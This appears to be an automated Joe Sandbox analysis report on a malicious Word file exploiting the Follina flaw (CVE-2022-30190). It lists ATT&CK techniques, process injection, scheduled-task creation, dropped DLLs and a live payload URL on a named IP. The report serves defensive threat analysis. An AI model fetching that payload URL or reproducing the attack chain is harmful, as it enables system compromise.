                            Encrypted Channel                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		1
                            Scheduled Task/Job                            		1
                            Virtualization/Sandbox Evasion                            		LSASS Memory1
                            Query Registry                            		Remote Desktop Protocol1
                            Archive Collected Data                            		Exfiltration Over Bluetooth11
                            Ingress Tool Transfer                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts3
                            Native API                            		Logon Script (Windows)1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		Security Account Manager11
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts12
                            Exploitation for Client Execution                            		Logon Script (Mac)Logon Script (Mac)411
                            Process Injection                            		NTDS1
                            Virtualization/Sandbox Evasion                            		Distributed Component Object ModelInput CaptureScheduled Transfer21
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                            Obfuscated Files or Information                            		LSA Secrets2
                            Process Discovery                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.commonRc.common1
                            DLL Side-Loading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                            Remote System Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                            File and Directory Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow16
                            System Information Discovery                            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 640940 Sample: doc782.docx Startdate: 07/06/2022 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->59 61 6 other signatures 2->61 8 regsvr32.exe 2->8         started        11 regsvr32.exe 2->11         started        13 regsvr32.exe 2->13         started        15 5 other processes 2->15 process3 dnsIp4 65 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 8->65 67 Injects code into the Windows Explorer (explorer.exe) 8->67 69 Writes to foreign memory regions 8->69 19 explorer.exe 8->19         started        71 Allocates memory in foreign processes 11->71 73 Maps a DLL or memory area into another process 11->73 22 explorer.exe 8 1 11->22         started        24 explorer.exe 13->24         started        51 185.234.247.119, 49744, 49763, 49865 INTERKONEKT-ASPL Russian Federation 15->51 53 192.168.2.1 unknown unknown 15->53 39 C:\Users\user\Desktop\~$doc782.docx, data 15->39 dropped 41 C:\Users\user\AppData\Local\...\123[1].RES, HTML 15->41 dropped 43 C:\Users\user\AppData\Local\...\89DF4BAA.htm, HTML 15->43 dropped 45 4 other files (1 malicious) 15->45 dropped 26 msdt.exe 21 15->26         started        29 cvtres.exe 1 15->29         started        31 cvtres.exe 1 15->31         started        33 4 other processes 15->33 file5 signatures6 process7 file8 63 Uses schtasks.exe or at.exe to add and modify task schedules 19->63 35 schtasks.exe 22->35         started        47 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 26->47 dropped 49 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 26->49 dropped signatures9 process10 process11 37 conhost.exe 35->37         started       

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            doc782.docx29%VirustotalBrowse
                            doc782.docx17%ReversingLabsDocument-Office.Exploit.CVE-2021-40444

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll0%MetadefenderBrowse
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll0%ReversingLabs
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui0%ReversingLabs

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            32.2.explorer.exe.2f80000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            34.2.explorer.exe.2ec0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            32.0.explorer.exe.2f80000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            33.0.explorer.exe.2e60000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            29.2.regsvr32.exe.4af0000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                            34.0.explorer.exe.2ec0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            28.2.regsvr32.exe.42f0000.3.unpack100%AviraHEUR/AGEN.1232827Download File
                            28.2.regsvr32.exe.42a0000.2.unpack100%AviraHEUR/AGEN.1234562Download File
                            27.2.regsvr32.exe.4420000.2.unpack100%AviraHEUR/AGEN.1232827Download File
                            27.2.regsvr32.exe.4990000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                            38.2.regsvr32.exe.2d80000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                            33.2.explorer.exe.2e60000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            29.2.regsvr32.exe.400000.0.unpack100%AviraHEUR/AGEN.1232827Download File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://roaming.edog.0%URL Reputationsafe
                            https://cdn.entity.0%URL Reputationsafe
                            https://powerlift.acompli.net0%URL Reputationsafe
                            https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                            https://cortana.ai0%URL Reputationsafe
                            https://api.aadrm.com/0%URL Reputationsafe
                            https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
                            https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                            https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                            https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                            http://www.borland.com/namespaces/Types-IWSDLPublish0%Avira URL Cloudsafe
                            https://store.office.cn/addinstemplate0%URL Reputationsafe
                            https://api.aadrm.com0%URL Reputationsafe
                            http://185.234.247.119/123.RES2%VirustotalBrowse
                            http://185.234.247.119/123.RES0%Avira URL Cloudsafe
                            https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                            https://www.odwebp.svc.ms0%URL Reputationsafe
                            https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                            http://185.234.247.119:80/123.RES2%VirustotalBrowse
                            http://185.234.247.119:80/123.RES0%Avira URL Cloudsafe
                            https://dataservice.o365filtering.com/0%URL Reputationsafe
                            https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                            http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish0%URL Reputationsafe
                            https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                            http://crl.micro0%URL Reputationsafe
                            https://ncus.contentsync.0%URL Reputationsafe
                            https://apis.live.net/v5.0/0%URL Reputationsafe
                            https://wus2.contentsync.0%URL Reputationsafe
                            http://www.borland.com/namespaces/TypesU0%URL Reputationsafe
                            https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
                            http://www.borland.com/namespaces/Types0%URL Reputationsafe
                            http://www.borland.com/namespaces/Typesp0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://185.234.247.119/123.REStrue
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.diagnosticssdf.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                              		high
                              https://login.microsoftonline.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                		high
                                https://shell.suite.office.com:1443DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                  		high
                                  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Typesexplorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                      		high
                                      https://autodiscover-s.outlook.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                        		high
                                        https://roaming.edog.DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                          		high
                                          https://cdn.entity.DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.addins.omex.office.net/appinfo/queryDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                            		high
                                            https://clients.config.office.net/user/v1.0/tenantassociationkeyDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                              		high
                                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                		high
                                                https://powerlift.acompli.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://rpsticket.partnerservices.getmicrosoftkey.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://lookup.onenote.com/lookup/geolocation/v1DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                  		high
                                                  https://cortana.aiDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                    		high
                                                    https://cloudfiles.onenote.com/upload.aspxDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                      		high
                                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                        		high
                                                        https://entitlement.diagnosticssdf.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                          		high
                                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                            		high
                                                            https://api.aadrm.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ofcrecsvcapi-int.azurewebsites.net/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/soap/httpregsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                              		high
                                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                		high
                                                                https://api.microsoftstream.com/api/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                  		high
                                                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                    		high
                                                                    https://cr.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                      		high
                                                                      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://portal.office.com/account/?ref=ClientMeControlDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                        		high
                                                                        https://graph.ppe.windows.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                          		high
                                                                          https://res.getmicrosoftkey.com/api/redemptioneventsDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://powerlift-frontdesk.acompli.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://tasks.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                            		high
                                                                            https://officeci.azurewebsites.net/api/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/workDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                              		high
                                                                              http://www.borland.com/namespaces/Types-IWSDLPublishregsvr32.exe, 00000026.00000002.713602734.0000000002F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://store.office.cn/addinstemplateDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/soap/encoding/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                		high
                                                                                https://api.aadrm.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                  		high
                                                                                  https://globaldisco.crm.dynamics.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                    		high
                                                                                    https://messaging.engagement.office.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                      		high
                                                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                        		high
                                                                                        https://dev0-api.acompli.net/autodetectDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.odwebp.svc.msDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://api.diagnosticssdf.office.com/v2/feedbackDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                          		high
                                                                                          https://api.powerbi.com/v1.0/myorg/groupsDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                            		high
                                                                                            https://web.microsoftstream.com/video/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                              		high
                                                                                              https://api.addins.store.officeppe.com/addinstemplateDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://185.234.247.119:80/123.RES~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp.0.drfalse
                                                                                              • 2%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://graph.windows.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                		high
                                                                                                https://dataservice.o365filtering.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://officesetup.getmicrosoftkey.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublishexplorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://analysis.windows.net/powerbi/apiDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                  		high
                                                                                                  https://prod-global-autodetect.acompli.net/autodetectDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                    		high
                                                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                      		high
                                                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                        		high
                                                                                                        http://crl.micromsdt.exe, 00000007.00000002.713967957.0000000005990000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/wsdl/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                            		high
                                                                                                            https://ncus.contentsync.DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                              		high
                                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                		high
                                                                                                                http://weather.service.msn.com/data.aspxDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                  		high
                                                                                                                  https://apis.live.net/v5.0/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/wsdl/mime/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                        		high
                                                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                          		high
                                                                                                                          https://management.azure.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                              		high
                                                                                                                              https://wus2.contentsync.DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://incidents.diagnostics.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                		high
                                                                                                                                https://clients.config.office.net/user/v1.0/iosDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                  		high
                                                                                                                                  http://www.borland.com/namespaces/TypesUexplorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmediaDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://o365auditrealtimeingestion.manage.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://api.office.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://incidents.diagnosticssdf.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/android/policiesDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://entitlement.diagnostics.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://substrate.office.com/search/api/v2/initDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://outlook.office.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/soap/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://storage.live.com/clientlogs/uploadlocationDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://outlook.office365.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://webshell.suite.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://www.borland.com/namespaces/Typesregsvr32.exe, 0000001C.00000002.672872094.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.borland.com/namespaces/Typespregsvr32.exe, 0000001B.00000002.672627187.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://management.azure.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                      		high

                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public IPs

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      185.234.247.119
                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                      		198004INTERKONEKT-ASPLtrue

                                                                                                                                                                      Private

                                                                                                                                                                      IP
                                                                                                                                                                      192.168.2.1

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                                      Analysis ID:640940
                                                                                                                                                                      Start date and time: 07/06/202219:48:552022-06-07 19:48:55 +02:00
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 12m 54s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Sample file name:doc782.docx
                                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                                      Number of analysed new started processes analysed:41
                                                                                                                                                                      Number of new started drivers analysed:1
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.expl.evad.winDOCX@31/32@0/2
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 15.4% (good quality ratio 14.6%)
                                                                                                                                                                      • Quality average: 77.3%
                                                                                                                                                                      • Quality standard deviation: 26.3%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      • Number of executed functions: 87
                                                                                                                                                                      • Number of non-executed functions: 76
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .docx
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                      • Scroll down
                                                                                                                                                                      • Close Viewer

                                                                                                                                                                      Warnings

                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.88.38, 52.109.76.34, 52.109.12.23, 52.109.12.21, 52.109.12.22, 20.223.24.244
